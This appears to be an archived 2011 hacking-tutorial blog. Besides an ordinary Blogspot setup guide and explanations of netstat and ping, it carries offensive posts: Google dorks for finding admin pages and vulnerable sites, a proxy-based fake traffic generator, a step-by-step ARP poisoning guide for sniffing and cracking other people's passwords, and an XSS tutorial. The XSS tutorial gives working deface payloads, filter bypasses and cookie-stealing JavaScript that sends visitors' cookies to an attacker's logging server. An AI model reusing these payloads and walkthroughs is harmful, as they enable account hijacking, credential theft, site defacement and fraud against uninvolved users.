Feb 27, 2011

Making a Blog-COmpleTe BlogSpot Tutorial

Many of us want a dashing and attractive blog.But some are unable to make it..This is a wanted tutorial by RKG bro aka RAVI...Leeme go ahead...

1- Go to www.blogspot.com and sign in with your google account details..In my case i will use my secondary id




2-You will see a window like below then put your details there..
Click on continue...

3- You will be in your dash board ... Then click on the button "CREATE YOUR BLOG NOW"


4- then give your website title and url of your website...then click on continue

5-Then choose your starter template..Not permanent you can change this any time. i will go for simple
6-Go and take some beer/water many work left...now 1st part is over...




Moving on two part two....
__________________________________________________________________________________

Basic Functions of the tabs

 Browse them and you will understand what i meant..

__________________________________________________________________________________ 

Theme applying--
1- go to www.premiumbloggertemplates.com ( ma favourite)
2-select theme 
3-download
4-extract the theme


In my case i used GAME MADNESS theme


We need the XML document in my case it is like this



Go to DESIGN--->EDIT HTML then select on browse button select your XML file then click on upload...
We are done....Now my blog which looked like this

looks like this

The additional details about modifying your theme will be given in the site i gave you templates ....

_____________________________________________________________________________
Setting Up Custom DNS (Domain)

I cannot buy one domain to show you show i would prefer to go to any of the below sites

http://www.shoutmeloud[dot]com/how-to-setup-co-cc-domain-for-your-blogspot-blog.html
http://www.google[dot]com/support/blogger/bin/answer.py?hl=en&answer=55373

_____________________________________________________________________________
Adding Additional Gadgets-

Go to the Design--->Page elements...
Click on add gadgets


To add 3rd party applications click on HTML/JAVASCRIPT
Now paste your html script there....
We have successfully added a widget 
You can get many gadgets from here

______________________________________________________________________________
That's all


Do not copy without my permissions

Happy Blogging

Web site i used-- www.test-site-hacking-class.blogspot.com

Feb 26, 2011

SQLi | LFI | XSS | ShEll UpLoad - Vulnerable site scanner


This is a great tool i find that scans for SQLi | LFI | XSS | ShEll UpLoad vulnerable websites.I used this software when i went to practice now i don't use it any more.


Then follow the procedure how to scan it .... Pic below


Hope you understand..any queries do reply :)

Download here - http://www.multiupload.com/87MMECTG0Y

Here are 2 sites i got with some other dorks



NOTE-Don't leech it..
            This is not my software  

Happy hacking

Feb 24, 2011

Xsser 1.5 - Web Penetration testing tool

XSSer 1.5 is the  BETA release of XSSer version 1.0.The author has named this version as the “Swarm Edition“.

Why it is used?

XSSer is a Web penetration testing tools that comes handy and helps in the process of detecting and exploiting XSS injections against different applications.

This tool have several options to try to bypass certain filters,and various other options for the web penetration tester


The update version have many improved options like 


  • Added GTK option
  • HTTP Response Splitting (ak.a Induced attack!)
  • DoS (Server) injection
  • Final code (added DCP & DOM injections)
  • Update option
  • Code clean
  • Bugfixing
  • New options menu
  • Updated dork list.
  • More advanced statistics system
 Download it from - http://xsser.sourceforge.net/

Happy hacking

    Feb 23, 2011

    ~~Netstat and Ping Command~~DEtailEd with pictures




    In this article i will introduce the basic commands that will be used in our further articles about network hacking..So lets start on

    1-NETSTAT-It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
     netstat [-a] [-b] [-e] [-f] [-n] [-o] [-r] [-s] [-t] [-v] [-p proto] [interval]

    These are the commands 

    now their uses

    -a Displays all connections and listening ports
    -b Displays the executable involved in creating each connection or listening port. (Added in XP SP2.)
    -e Displays Ethernet statistics
    -f Displays Fully Qualified Domain Names for foreign addresses. (In Windows Vista/7 only)
    -n Displays addresses and port numbers in numerical form
    -o Displays the owning process ID associated with each connection
    -p proto Shows connections for the protocol specified by proto; proto may be any of: TCP, UDP, TCPv6, or UDPv6.
    -r Displays the routing table
    -s Displays per-protocol statistics
    -t Displays the current connection offload state, (Windows Vista/7)
    -v When used in conjunction with -b, will display sequence of components involved in creating the connection or listening port for all executables. (Windows XP SP2, SP3)
    [interval] An integer used to display results multiple times with specified number of seconds between displays. Continues until stopped by command ctrl+c. Default setting is to display once,

    Example command -a

    The TCP/IP Connections

    TCP and UDP connections and their IP and port addresses can be seen by the command 
      netstat -an
     

     COnfuSed???

    ok now the state is what the condition of the TCP or UDP connections


    CLOSED Indicates that the server has received an ACK signal from the client and the connection is closed
    CLOSE_WAIT Indicates that the server has received the first FIN signal from the client and the connection is in the process of being closed
    ESTABLISHED Indicates that the server received the SYN signal from the client and the session is established
    FIN_WAIT_1 Indicates that the connection is still active but not currently being used
    FIN_WAIT_2 Indicates that the client just received acknowledgment of the first FIN signal from the server
    LISTENING Indicates that the server is ready to accept a connection
    LAST_ACK Indicates that the server is in the process of sending its own FIN signal
    SYN_RECEIVED Indicates that the server just received a SYN signal from the client
    SYN_SEND Indicates that this particular connection is open and active

    CHECKING FOR MALWARES

    Bull shit you got a malware in your computer and cannot find it../?

    We can check malwares by the netstat command we need to only see which connections are in a relationship with the outer world

    netstat -b 
     Note that the Process ID (PID) is given when using Windows XP. In Windows Vista/7, the switch "o' has to be added to display PIDs. This command can be combined with other tools such as Task Manager to analyze what executable files and processes are active and are trying to make Internet connections.

     Another good news for all you can use this software as an alternate


      password- saurav
    ___________________________________________________________________
    2-PING-Ping is a part of the ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks..Ping is used to check weather the host is alive

    Our command is
    ping hostname.com
     ping is a very use full command for a hacker to obtain ip and check if the host is alive...so remember it

    Happy hacking


    Feb 21, 2011

    Using Google - The hackers way




    Every one know how to use Google..Even a child sits in front of the computer and Google his searches.But as I am teaching hacking here so i will Make you aware about some of the important Google DORkS That every hacker should know.

    What is a Google dork ?

    Let us type ext:pdf(ppt,doc anything you want) hacking we get something like this
    We get the particular type of file as we wanted that is .pdf ..

    Now lets move on to next..

    -DORKS-

    1-intitle and allintitle - It restricts the results to pages whose title contain specified word/phrase.

    intitle:admin will return only those pages whose title contains word 'admin'.
    intitle:admin login will return only those pages whose title contains word 'admin' and word 'login' can be in anywhere in page.

    allintitle:admin login will return those pages whose title contains both words admin and login.
     This is very useful for getting admin pages etc.

    Example picture

    Now i got a admin page using this
    Now moving on to next
    2-site - It returns the websites of specified domains .

    Example- site:hacking-class.blogspot.com will return the links of webpages of  domain hacking-class.blogspot.com


    site:hacking-class.blogspot.com web parameter  will return all the webpages of domain hacking-class.blogspot.com which contain words 'web parameter'.


    Suppose you want google to return only government websites,
    you can use site:gov or say pakistani websites use site:pk


    moving on to number 3....

    3-inurl-This restricts the results to sites whose URL's contains specified phrase.\
    This is almost similar to the dork allintitle which i explained previously.

    This is used to find vulnerable sites like for XSS using the dork inurl:search.php?q=

    4- related- It returns the websites similar to specified websites.

    Example i will search flyproxy(a proxy site) we get 

    We get some similar proxy sites..

    6- ext- It specifies the extension .


    This is explained in the very first have a look there ....

    Note-There are many dorks and some are used in google hacking (ghdb) google hacking database...
    No leeching please

    HappY hAcking



    Feb 20, 2011

    Fake Hits Generator | Traffic Creator



    Creating a website and not getting traffic :( ... So sad...Now I am gonna show how to boost up your website traffic..

    For this you need
    i)Free Traffic for Life!.By Tukanas
    ii)fresh proxies every day
    iii)Your website
    iv)A brain

    How the whole thing works?
    When you switch from one proxy to another then the website recognizes you as a different visitor who is browsing the forum OR blog.You cannot do this manually..So this software Changes proxy and send hits to your site

    Download the software from here
     Password for the rar is hackingclass

    Extract the rar file..Then you will see something like this


    THen switch on the the proxies.txt file and open it

    THen get a fresh list of proxies because the proxies in the txt file may be outdated..This may help you

    Copy the proxies and paste it in the proxies.txt file




    Then save the file...Then move on to the urls.txt file then open it
    replace the link with your site


    Now we are done ... Now open the Free Traffic for Life!.exe
    CLick on start ... Then go and take some nap and come back to see the results

    EXAMPLE 
    I created this site as a example for you guyz 

    Before using this trick

    After using this trick



    Note-Do not use this for illegal purposes..I am not responsible what you do with this
    Never try this on hacking-class i hate fake traffic-if you do then i will be having your ip then you  know what i can do.:P

    Happy Hacking


    Feb 18, 2011

    Making a ARP Poisoning Attack



    Address Resolution Protocol (ARP) poisoning is a type of attack where the Media Access Control (MAC) address is changed by the attacker.  Also, called an ARP spoofing attacks, it is effective against both wired and wireless local networks.  Some of the things an attacker could perform from ARP poisoning attacks include stealing data from the compromised computers, eavesdrop using man-in-the middle methods, and prevent legitimate access to services, such as Internet service.

    How to make this attack work ?
    What you will need:


    • A laptop.
    • Cain and able. Download it from, here
    • A network to sniff.
    How to do this-

    1) Download and install cain and able.


    2) Set your laptop up and steal an Ethernet connection from a nearby computer on the network. Plug the Ethernet cable in. You are now connected. With no restrictions on what you can run.

    3) Start cain and able.

    4) Now click on the sniffer tab. Now notice the two symbols – the one that looks the same as the one on the sniffer tab and the one that looks like a nuclear sign.

    5) Mouse over them and they will tell you that one starts the sniffer and the other starts ARP poisoning.

    6) Now click on configure -> click on the ARP tab and make sure that you are using your real ip and mac address, if you don’t you wont get any hosts or be able to ARP poision.



    7) Now start the sniffer and press the blue plus sign. This will let you scan for hosts in your subnet.


    8) Now go back to configure and select use a spoofed ip and mac address. Now type an ip from your sub net but the last bit must be numbers that are unused so the network doesn’t get confused.

    9) Select all the hosts you find and right click and go resolve host name. Now try to find the router, it will usually stand out easily. The router probably wont have a name as well as being a different brand from everything else and have a really low or really high ip address so you should spot it easily.

    10) Now click on the ARP tab at the bottom of the sniffer window. Click on the top table part and click the blue plus sign again. This brings up a window that allows you to select the ip addresses that you want to ARP poison the first one you select should be the router and in the second box select any computers you want to listen to.

    11) Click OK. Click the start ARP button. You are now listening between the router and as many computers as you selected.

    12) Watch as the routed packets role in. Select the password tab at the bottom of the screen and watch the passwords appear..


    13) If the password appears in hashes send it to the cracker and crack it :)


    If you did not understand it then read the article carefully or google search it or just comment i will try to help you..

    COUNTER MEASURES

    Download Commodo Firewall from the link below:
    here

    Once you have downloaded and Installed it successfully.
    Click on Firewall at the top bar and then click Advanced button at the left pane > Go to Attack Detection Settings > and check “Protect the ARP Cache”.


    HAppY HacKing

    Feb 16, 2011

    A Complete Tutorial On XSS (cross site scripting)






    Welcome To another lesson in which i will be covering XSS..

    Table Of Contents
    What is XSS?
    Finding XSS Vulnerabilities
    The Basics On XSS
    Deface Methods
    Cookie Stealing
    Filtration Bypassing
    ___________________
    What is XSS?
    'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
    is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
    malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
    1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

    2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

    3-In the Third one  you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also  inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most  places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!

    Finding XSS Vulnerabilities
    Well to start finding these vulnerabilities you can start checking out
    Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's and many things

    Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
    inurl:"search.php?q=" now that is a common page and has a lot of results, Now lets move on to the next part

    The Basics On XSS


    To know the basic this Picture may help you 


    The most used Xss injection is 

    <script>alert("XSS")</script>

    This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject 
    <script>alert("your name or message")</script>
    So going previous i told you a google dork , search.php?q= 
    Well we will use this to check for vulnerabilities

    To check if it is vulnerable we type

    www.site.com/search.php?q=<script>alert("your name or message")</script>


    This then gives a popup like this




     Many at times this works but if it does not work don't cry we have another way.. :P

     You can try injecting HTMl ;)

    You can put this two strings to inject html

    <h1>anything you want</h1>
    <br><br><b><u>any thing you want</u></b>

    so our url will be

    www.site.com/search.php?q= <h1>anything you want</h1>
    or 
    www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
    If you see the bold text on the page and newlines then you knows its vuln

    Example






















    Deface Methods 
    Well now you understand how XSS works, we can explain some simple XSS deface methods, there
    are many ways for defacing i will mention some of the best and most I used,
     
    <html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

    the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
    displays the IMAGE linked to it on the webpage.


    ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

    let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

    <IMG SRC="http://site.com/yourDefaceIMAGE.png">

    Ok it helps to make your picture big so it stands out and its clear the site got hacked.

    Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

    <EMBED SRC="http://site.com/xss.swf"

    that will execute the flash video linked to it.

    Now a popup or a redirection

    <script>window.open( "http://hacking-class.blogspot.com" )</script>

     Cookie Stealing

    This is the best thing about XSS..

    First Get your self a cookie stealer- from here 

    ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
    and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

    ok now your gona want to insert this code.

    window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

    or

    document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
    now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
    the second one is more stealth.

    Now it is the time to hijack the cookies



    http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
     Filteration Bypassing


    Alot of sites may seem vulnerable but not executing the code..This will help you

    Some common methods to bypass filteration is

    ')alert('xss');

    or

    ");alert('xss');

    that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

    You can also try hexing or base64 encoding your data before you submit,

    Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
    before.

    Some other ways to bypass filteration

    <script type=text/javascript>alert("saurav")</script>
    <script>alert("saurav")</script>;
    <script>alert("saurav");</script>
    <script>alert("/saurav"/)</script>

    Hope that helped you


    Happy Hacking

    Share

    Twitter Delicious Facebook Digg Stumbleupon Favorites More